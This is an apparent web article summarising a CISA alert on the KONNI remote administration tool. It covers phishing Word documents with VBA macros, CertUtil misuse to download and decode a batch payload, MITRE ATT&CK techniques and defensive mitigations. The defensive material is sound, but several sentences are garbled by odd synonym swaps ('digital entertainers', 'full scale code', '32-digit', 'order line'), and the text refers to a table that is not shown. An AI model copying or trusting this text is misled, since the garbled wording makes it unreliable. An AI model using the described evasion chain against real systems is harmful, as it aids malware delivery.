What is Konni Malware?

KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts.

The Cybersecurity and Infrastructure Security Agency (CISA) has watched digital entertainers utilizing messages containing a Microsoft Word record with a malevolent Visual Basic Application (VBA) full scale code to convey KONNI malware.

Technical Details

KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code.

This malicious code can change the textual style shading from light grey to black (to trick the user to enable content), check if the Windows working framework is a 32-digit or 64-bit form, and build and execute the order line to download the documents.

Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator. It also incorporates a built-in function to decode base64-encoded files. The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection.

The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.

MITRE ATT&CK Techniques

According to MITRE, KONNI uses the ATT&CK techniques listed below

Technique - Use

System Network Configuration Discovery - KONNI can collect the Internet Protocol address from the victim’s machine.

System Owner/User Discovery - KONNI can collect the username from the victim’s machine.

Masquerading: Match Legitimate Name or Location - KONNI creates a shortcut called Anti virus service.lnk in an apparent attempt to masquerade as a legitimate file.

Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - KONNI has used File Transfer Protocol to exfiltrate reconnaissance data out.

Input Capture: Keylogging - KONNI has the capability to perform keylogging.

Mitigations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems

• Maintain up-to-date antivirus signatures and engines. See Protecting Against Malicious Code.

• Keep operating system patches up to date. See Understanding Patches and Software Updates.

• Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.

• Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators’ group unless required.

• Enforce a strong password policy. See Choosing and Protecting Passwords.

• Exercise caution when opening email attachments, even if the attachment is expected and the sender appears to be known. See Using Caution with Email Attachments.

• Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.

• Disable unnecessary services on agency workstations and servers.

• Visit the MITRE ATT&CK Techniques pages (linked in table 1 above) for additional mitigation and detection strategies.

Resources

• d-hunter – A Look Into KONNI 2019 Campaign

• MITRE ATT&CK – KONNI

• MITRE ATT&CK for Enterprise